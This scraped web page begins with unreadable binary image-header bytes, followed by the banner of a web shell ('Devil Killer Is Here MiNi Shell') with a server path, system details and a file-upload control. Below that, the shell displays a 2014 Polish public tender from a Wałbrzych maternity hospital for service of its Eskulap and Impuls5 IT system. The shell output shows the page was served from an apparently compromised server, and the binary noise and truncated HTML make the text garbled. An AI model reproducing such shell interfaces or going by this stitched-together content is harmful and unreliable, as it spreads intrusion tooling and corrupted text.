JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/248907-N-2014.html

<p class="kh_header"><b>Wałbrzych: Usługi serwisu i nadzoru autorskiego nad zintegrowanym systemem informatycznym obejmującym oprogramowanie Eskulap i Impuls5 dla  Specjalistycznego  Szpitala Ginekologiczno - Położniczego  im. E. Biernackiego  przy ul. Paderewskiego 10 w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 248907 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Szpital Ginekologiczno-Położniczy im. E. Biernackiego w Wałbrzychu , ul. Paderewskiego 10, 58-301 Wałbrzych, woj. dolnośląskie, tel. 074 8877183, faks 074 8877103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi serwisu i nadzoru autorskiego nad zintegrowanym systemem informatycznym obejmującym oprogramowanie Eskulap i Impuls5 dla  Specjalistycznego  Szpitala Ginekologiczno - Położniczego  im. E. Biernackiego  przy ul. Paderewskiego 10 w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Ewidencja i uzupełnianie Zgłoszenia Serwisowego przez ZAMAWIAJĄCEGO jest realizowane wyłącznie w systemie HD. Obsługa Zgłoszenia Serwisowego jest realizowana przez Wykonawcę w systemie HD lub z wykorzystaniem innych mediów bądź wizyt osobistych, przy czym każdorazowo w HD ewidencjonowany jest status zgłoszenia.
2.Wraz z podpisaniem Umowy ZAMAWIAJĄCY otrzymuje  dane identyfikacyjne (login, hasło) umożliwiające Użytkownikom ZAMAWIAJĄCEGO autentykację w systemie Help Desk zwanym dalej HD udostępnionym przez WYKONAWCĘ pod adresem helpdesk.si-alma.pl.  
3.W celu zgłoszenia błędu aplikacji, awarii, pobrania aktualizacji lub zamówienia innej usługi objętej przedmiotem umowy, Zamawiający otrzymuje dane identyfikacyjne ( login i hasło ) umożliwiające przynajmniej 4 Użytkownikom Zamawiającego na autentykację w systemie Help Desk, w celu zarejestrowania Zgłoszenia Serwisowego. Wraz z danymi identyfikacyjnymi, Użytkownikom zostają przyznane w systemie HD odpowiednie uprawnienia adekwatne do pakietu usług subskrybowanych przez ZAMAWIAJĄCEGO. 
4.Użytkownicy systemu HD posiadają możliwość dokonywania zmian swoich danych kontaktowych oraz podstawowych danych podmiotowych ZAMAWIAJĄCEGO - tzw. Panel Klienta. 
5.Użytkownicy systemu HD są zobowiązani do bieżącego śledzenia informacji pojawiających się w systemie HD.  System HD monitoruje i powiadamia Użytkowników o pojawieniu się zmian bądź nowych treści 
5.1Każde zgłoszenie serwisowe obejmować będzie jeden temat do rozwiązania. W przypadku, gdy zgłoszenie obejmuje kilka tematów Wykonawca może rozdzielić je na kilka zgłoszeń.
6.W ramach 12 miesięcznego serwisu aplikacji Zamawiający wymaga:
a)	Objęcia serwisem aplikacji następujących modułów:
Lp.	Nazwa Aplikacji
1.Ruch Chorych - blok izba przyjęć
2.		Ruch Chorych - blok statystyka
3.		Ruch Chorych - blok oddział
4.		Rejestracja do poradni
5.		Poradnia
6.		Dokumentacja Medyczna
7.		Zlecenia Medyczne
8.		Rozliczenia z Płatnikami
9.		Gruper (do 80 lic RCH)
10.		Kalkulacja kosztów procedur
11.		Rachunek Kosztów Leczenia
12.		Blok Operacyjny
13.		Blok Porodowy
14.		Laboratorium
15.		Sterowniki do maszyn laboratoryjnych
16.		Bakteriologia
17.		Pracownia diagnostyczna
18.		Histopatologia
19.		Apteka
20.		Apteczka
21.		Zakażenia Szpitalne
22.		Żywienie 
23.	Administrator Eskulap, Impuls
24.	Magazynek oddziałowy
25.		HL-
26.		e-Rejestracja
27.	Finanse- Księgowość
28.	Kadry
29.	Płace
30.	Magazyn
31.	Środki Trwałe
32.Ruch chorych - blok EWUŚ
b)Świadczenia usług serwisu aplikacji modułów wyszczególnionych w punkcie. 6a) wg następującego schematu:
Czas  reakcji Serwisu	Do 4h	Czas liczony od momentu zaewidencjonowania w serwisie HD Zgłoszenia Serwisowego przez zamawiającego do momentu przyjęcia zgłoszenia tj. nadania mu statusu zarejestrowane w godzinach pracy serwisu 8.00 -16.00 od poniedziałku do piątku, poza dniami świątecznymi.
Czas usunięcia Błędu Aplikacji Do 7 dniCzas liczony w dniach roboczych od momentu przyjęcia zgłoszenia - status zarejestrowane do momentu usunięcia błędu aplikacji
Czas usunięcia Awarii	Do 48hCzas liczony w dniach roboczych od momentu przyjęcia zgłoszenia - status zarejestrowane do momentu usunięcia awarii
Czas usunięcia Usterki Programistycznej	Do 30 dni	Czas liczony w dniach roboczych od momentu przyjęcia zgłoszenia - status zarejestrowane do momentu usunięcia usterki programistycznej
7.W ramach 12 miesięcznego nadzoru autorskiego Zamawiający wymaga:
a)Objęcia nadzorem autorskim następujących modułów:
Lp.	Nazwa Aplikacji
1.Ruch Chorych - blok izba przyjęć
2.	Ruch Chorych - blok statystyka
3.	Ruch Chorych - blok oddział
4.	Rejestracja do poradni
5.	Poradnia
6.	Dokumentacja Medyczna
7.	Zlecenia Medyczne
8.	Rozliczenia z Płatnikami
9.	Gruper (do 80 lic RCH)
10.	Kalkulacja kosztów procedur
11.	Rachunek Kosztów Leczenia
12.	Blok Operacyjny
13.	Blok Porodowy
14.	Laboratorium
15.	Sterowniki do maszyn laboratoryjnych
16.	Bakteriologia
17.	Pracownia diagnostyczna
18.	Histopatologia
19.	Apteka
20.	Apteczka
21.	Zakażenia Szpitalne
22.	Żywienie 
23.	Administrator Eskulap, Impuls
24.	Magazynek oddziałowy
25.	HL-7
26.	e-Rejestracja
27.	Finanse- Księgowość
28.	Kadry
29.	Płace
30.	Magazyn
31.	Środki Trwałe
32.	Ruch chorych - blok EWUŚ
b)Udostępnienia w serwisie HD Upgrade lub Update aplikacji związanymi ze zmianą przepisów prawa. Termin dostarczenia zmian (upgrade lub update) musi pozwolić Zamawiającemu na instalację oprogramowania zgodnie z terminem wymaganym przez ustawy,  najpóźniej w dniu wejścia w życie zmian prawa.
8.W ramach 12 miesięcznej umowy na serwis aplikacji w zakresie konsultacji  (KA) Zamawiający wymaga:
a)Objęcia Konsultacjami następujących modułów:
Lp.Nazwa Aplikacji	Objęte usługą konsultacji (KA)
1.		Ruch Chorych - blok izba przyjęć	NIE
2.		Ruch Chorych - blok biuro przyjęć statystyka	NIE
3.		Ruch Chorych - blok oddział	NIE
4.		Rejestracja do poradni	NIE
5.		Poradnia	NIE
6.	Dokumentacja Medyczna	                     NIE
7.	Zlecenia Medyczne	NIE
8.		Rozliczenia z Płatnikami	(KA)
9.		Gruper (do 80 lic RCH)	(KA)
10.		Kalkulacja kosztów procedur	NIE
11.		Rachunek Kosztów Leczenia	NIE
12.		Blok Operacyjny	NIE
13.		Blok Porodowy	NIE
14.		Laboratorium	NIE
15.		Sterowniki do maszyn laboratoryjnych	NIE
16.		Bakteriologia	NIE
17.		Pracownia diagnostyczna	NIE
18.		Histopatologia	NIE
19.		apteka	NIE
20.	Apteczka	NIE
21.		Zakażenia Szpitalne	NIE
22.		Żywienie 	NIE
23.		Administrator ESKULAP IMPULS	NIE
24.		Magazynek oddziałowy	NIE
25.		HL-7	NIE
26.		e-Rejestracja	NIE
27.		Finanse- Księgowość	(KA)
28.		Kadry	NIE
29.		Płace	NIE
30.		Magazyn	NIE
31.		Środki Trwałe	NIE
32.		Ruch chorych - blok EWUŚ	NIE
b) Świadczenia usługi konsultacji modułów wyszczególnionych w pkt 8.a) wg następującego schematu:
1.	Godziny pracy Serwisu 	800-1600	Od poniedziałku do piątku w dni robocze.
2. 	Czas  reakcji Serwisu	Do 4h	Czas liczony od momentu zaewidencjonowania w serwisie HD Zgłoszenia Serwisowego do momentu przyjęcia zgłoszenia tj. nadania mu statusu zarejestrowane w godzinach pracy serwisu.
3.	Czas obsługi Konsultacji 	Do 10 dni	Czas liczony w dniach roboczych od momentu przyjęcia zgłoszenia - status zarejestrowane do momentu obsłużenia konsultacji.
9. W ramach 12 miesięcznej umowy na serwis aplikacji w zakresie nadzoru eksploatacyjnego  Zamawiający wymaga:
a)	Objęcia nadzorem eksploatacyjnym modułów wyszczególnionych w punkcie 7a)
b)	Nadzór eksploatacyjny w wymiarze 88 godzin w okresie trwania umowy w formie
 - rzeczywistych pobytów w siedzibie Zamawiającego:  jedna wizyta liczona jako siedem godzin NE: od godz. 8 do godz. 15 
- za pomocą zdalnego dostępu: rzeczywista liczba godzin NE potrzebna na zrealizowanie zadania.
c)	Świadczenia usługi nadzoru eksploatacyjnego modułów wyszczególnionych w pkt 7a) wg następującego schematu:
1.	Godziny pracy Serwisu 	800-1600	Od poniedziałku do piątku w dni robocze.
2. 	Czas reakcji Serwisu	Do 4h	Czas liczony od momentu zaewidencjonowania w serwisie HD Zgłoszenia Serwisowego dotyczącego usługi NE do momentu przyjęcia zgłoszenia tj. nadania mu statusu  zarejestrowane  w godzinach pracy serwisu.
3. 	Termin realizacji przez  Serwis usługi nadzoru eksploatacyjnego	Do 15 dni	Czas liczony w dniach roboczych od momentu przyjęcia zgłoszenia - status zarejestrowane  do momentu zakończenia usługi nadzoru eksploatacyjnego.
10.	 W ramach 12 miesięcznej umowy na usługę serwisu motoru bazy danych Zamawiający wymaga gotowości usuwania awarii motoru bazy danych.
1.	Godziny pracy Serwisu 	800-1600	Od poniedziałku do piątku w dni robocze.
2. 	Czas reakcji Serwisu	Do 4h	Czas liczony od momentu zaewidencjonowania w serwisie HD Zgłoszenia Serwisowego dotyczącego usługi NE do momentu przyjęcia zgłoszenia tj. nadania mu statusu  zarejestrowane w godzinach pracy serwisu.
3. 	Termin realizacji przez  Serwis usługi serwisu motoru bazy danych: awaria motoru bazy danych, pomoc w odtwarzaniu bazy danych w razie awarii bazy danych	Do  48h	Czas liczony w dniach roboczych od momentu powzięcia przez Serwis zlecenia wykonania usługi  do momentu usunięcia awarii 
Definicje:
1.	serwis aplikacji - Gotowość WYKONAWCY do usuwania błędów oprogramowania aplikacyjnego, awarii, usterki programistycznej, oraz podjęcia prac zleconych przez zamawiającego
2.	nadzór autorski - Usługa realizowana przez Autora Oprogramowania Aplikacyjnego za pośrednictwem WYKONAWCY. Subskrypcja usługi zapewnia zamawiającemu poprawę jakości oraz poszerzenie zakresu funkcjonalnego Oprogramowania Aplikacyjnego, jak również dostosowanie go do zmian czynników wewnętrznych organizacji zamawiającego oraz zewnętrznych, będących efektem nowelizacji uwarunkowań prawnych. 
W ramach usługi Autor gwarantuje:
a)	prowadzenie rejestru zgłaszanych przez użytkowników Błędów Aplikacji,
b)	wprowadzanie do Aplikacji nowych funkcji oraz usprawnień już istniejących stanowiących wynik sugestii użytkowników, 
c)	wprowadzanie do Aplikacji nowych funkcji oraz usprawnień już istniejących stanowiących wynik inwencji twórczej Autora,
d)	wprowadzanie do Aplikacji zmian stanowiących konsekwencję wejścia w życie nowych aktów prawnych lub aktów prawnych zmieniających obowiązujący stan prawny, opublikowanych w postaci ustaw lub rozporządzeń,
e)	wprowadzanie do Aplikacji zmian wymaganych przez wyszczególnione poniżej organizacje w stosunku do których zamawiający ma obowiązek prowadzenia sprawozdawczości:
-	Ministerstwa Zdrowia,
-	NFZ, 
- Centrów Zdrowia Publicznego,
-  gotowość do odpłatnego wykonania na zlecenie zamawiającego zaproponowanych przez niego modyfikacji Aplikacji.
3.	konsultacje - Gotowość do świadczenia zamawiającemu Konsultacji  w odniesieniu do modułów wytypowanych przez niego w pkt 8 a) i Załączniku nr 1 do Umowy za pomocą serwisu HD. 
4.	nadzór eksploatacyjny - prawo do dowolnego wykorzystania określonych w Umowie ilości wizyt serwisowych w miesiącu, w wymiarze 8h każda. 
Przedmiotem nadzoru eksploatacyjnego może być szereg prac o charakterze eksploatacyjnym, konserwacyjnym oraz konsultacyjnym wyszczególnionych poniżej z wyłączeniem motoru bazy danych. NE dotyczy:
a)   Konsultacji z zakresu administracji i użytkowania Aplikacji,
b)   Instalowanie Upgrade, Update Aplikacji
c)   Szkolenie administratorów z zakresu wprowadzanych zmian w Aplikacjach, 
d)	Rekonfiguracja i parametryzacja Aplikacji, w celu zoptymalizowania i podniesienia sprawności ich działania,
e)	Tworzenie nowych raportów oraz modyfikacje istniejących mające na celu dostosowanie ich zakresu tematycznego oraz graficznego do potrzeb ZAMAWIAJĄCY,
f)	Tworzenie nowych wydruków na dokumentach dostarczonych w formie papierowej przez ZAMAWIAJĄCĘGO oraz modyfikacje istniejących wydruków,
g)	Pomoc w awaryjnym odtwarzaniu stanu Aplikacji i zgromadzonych danych archiwalnych na poprawnie zabezpieczonych na nośnikach danych,
h)	Pomoc w przekazywaniu danych i sprawozdań do jednostek zewnętrznych (Organu założycielskiego, Ministerstwa Zdrowia, NFZ, Biura Rejestru Usług Medycznych, Centrum Organizacji Ochrony Zdrowia, Państwowego Zakładu Higieny, 
i)	Dokonywanie ponownych instalacji Aplikacji i narzędzi w przypadkach zmiany infrastruktury informatycznej ZAMAWIAJĄCEGO (uwzględnia przeniesienie Aplikacji na inną platformę systemową),
j)	Doradztwo w zakresie rozbudowy środowiska informatycznego ZAMAWIAJĄCEGO.
5.	motor bazy danych  - Program komputerowy dedykowany do zarządzania bazami danych, o którego prawa majątkowe przynależą firmie Oracle Inc.
6.	Błąd aplikacji - Oznacza działanie powtarzalne, pojawiające się za każdym razem w tym samym miejscu w Aplikacji i prowadzące w każdym przypadku do otrzymywania błędnych wyników jej działania
7.	Awaria (błąd krytyczny) - Oznacza sytuację, w której nie jest możliwe prawidłowe używanie Oprogramowania Aplikacyjnego, lub jednego z modułów Oprogramowania Aplikacyjnego,  z powodu uszkodzenia lub utraty kodu programu, struktur danych lub zawartości bazy danych
8.	Usterka Programistyczna - błąd aplikacji, mimo identyfikacji którego Aplikacja nadal funkcjonuje, natomiast usunięcie którego wymaga ingerencji Autora.
9.	Upgrade aplikacji - uaktualnienie obejmujące zmiany zakresu funkcjonalnego Aplikacji oznaczające przynajmniej jedną z poniższych modyfikacji:
a)	usprawnienia dotychczasowych mechanizmów, 
b)	poszerzenia funkcjonalności zastosowanych mechanizmów,
c)	dodanie nowych mechanizmów,
d)	zmiany estetyczne i formalne.
Upgrade Aplikacji akceptuje automatycznie strukturę bazy danych poprzedzającego go ostatniego opublikowanego przez producenta Upgrade oraz pociąga za sobą konieczność uaktualnienia Dokumentacji, w której ujęte i opisane zostają wprowadzone modyfikacje
10.	 update aplikacji - uaktualnienie obejmujące zmiany związane z eliminacją zidentyfikowanych Błędów poszczególnych Aplikacji, najczęściej nie ingerujące w strukturę bazy danych. W większości przypadków Update wiąże się ze zmianą interfejsu użytkownika lub usprawnieniem działania funkcji lub procesów, natomiast nie wzbogacają Aplikacji o nowe rozwiązania. Update Aplikacji akceptuje automatycznie strukturę bazy danych poprzedzającego go ostatniego opublikowanego przez producenta Update oraz nie pociąga za sobą konieczności uaktualnienia Dokumentacji.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 20%  wartości zamówienia podstawowego, w przypadku zwiększenia zapotrzebowania na usługi serwisu i nadzoru autorskiego nad zintegrowanym systemem informatycznym obejmującym oprogramowanie Eskulap i Inpuls 5.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.26.70.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą Ofertę wadium w wysokości: 
3.000,00 zł (słownie: trzy tysiące 00/100 zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć odpowiednie      dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:
      - oświadczenie o posiadaniu uprawnień niezbędnych do wykonywania działalności w zakresie
odpowiadającym przedmiotowi zamówienia, wg wzoru formularza nr 2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być przedmiotowe oświadczenie złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenia złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie, że posiada wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia oraz udokumentuje,  że wykonał  w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie - co najmniej  dwie usługi serwisu i nadzoru autorskiego nad zintegrowanym systemem informatycznym w szpitalu, o wartości każdej z usług nie mniej niż 150.000,00 zł.
 	 W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące
oświadczenia i dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem:                   
       - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, wg wzoru formularza nr 3;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie, że dysponuje lub będzie
 dysponował potencjałem technicznym do wykonania zamówienia wg wzorów formularza  nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie, że dysponuje lub będzie
  osobami zdolnymi do wykonania zamówienia wg wzorów formularza  nr 2 oraz  Wykonawca dołączy do  oferty wykaz pracowników zgodny z załącznikiem nr 7 do SIWZ, którzy będą uczestniczyć w wykonywaniu zamówienia  i którzy posiadają umiejętności administrowania poszczególnymi modułami aplikacji Eskulap i Impuls 5 (minimum 2 osoby: 1 osoba certyfikat z zakresu systemu Eskulap, 1 osoba z zakresu systemu Impuls5). Wykaz powinien zawierać imię i nazwisko pracownika, informację o doświadczeniu zawodowym w zakresie wykonywania usługi administrowania oprogramowaniem.
Ocena spełnienia tego warunku odbędzie wg kryteriów spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie, że znajduje się w dobrej sytuacji ekonomicznej i  finansowej  niezbędnych do wykonania przedmiotu zamówienia wg wzoru formularza nr 2 oraz udokumentuje, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 300 000,00 zł.  
 
W celu potwierdzenia spełnienia niniejszych warunków Wykonawcy zobowiązani są przedłożyć :
	- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
